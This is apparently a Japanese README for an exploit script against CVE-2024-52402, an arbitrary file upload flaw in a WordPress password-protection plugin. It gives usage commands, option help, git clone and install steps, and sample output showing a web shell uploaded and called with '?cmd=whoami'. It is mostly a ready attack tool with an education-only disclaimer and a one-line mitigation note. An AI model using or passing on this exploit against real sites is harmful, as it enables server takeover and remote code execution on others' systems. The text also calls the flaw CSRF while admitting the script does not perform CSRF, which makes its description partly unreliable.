
WordPress Exclusive Content Password Protect プラグイン <= 1.1.0 - CSRFによる任意ファイルアップロードの脆弱性
このエクスプロイトは、WordPress Exclusive Content Password Protect プラグインのバージョン 1.1.0 以下におけるクロスサイトリクエストフォージェリ (CSRF) 脆弱性を対象としています。この脆弱性により、攻撃者は Web サーバーに Web シェルをアップロードし、潜在的なリモートコード実行を引き起こす可能性があります。
この脆弱性を悪用するには、ターゲットの WordPress サイト URL、有効な WordPress ユーザー名、およびパスワードを指定する必要があります。エクスプロイトスクリプトは WordPress サイトにログインし、Web シェルのアップロードを試みます。
python CVE-2024-52402.py -u <target> -un <username> -p <password>
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
このスクリプトは、Exclusive Content Password Protect プラグインの CSRF 脆弱性を悪用して、WordPress サーバーに Web シェルをアップロードします。ただし、CSRF 攻撃を直接実行するわけではなく、プラグインのファイルアップロード機能を活用してエクスプロイトを達成することに焦点を当てています。
リポジトリのクローン
git clone https://github.com/Nxploited/CVE-2024-52402.git
cd CVE-2024-52402
要件のインストール
requests ライブラリがインストールされていることを確認してください:
pip install requests
スクリプトの実行 以下のコマンドを使用してスクリプトを実行します:
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
この脆弱性を緩和するには、Exclusive Content Password Protect プラグインを、この問題が修正された最新バージョンに更新してください。
このスクリプトは教育目的のみを対象としています。明示的なテスト許可がないシステムに対してこのスクリプトを不正に使用することは違法かつ非倫理的です。
エクスプロイト作成者: Nxploit , Khaled alenazi.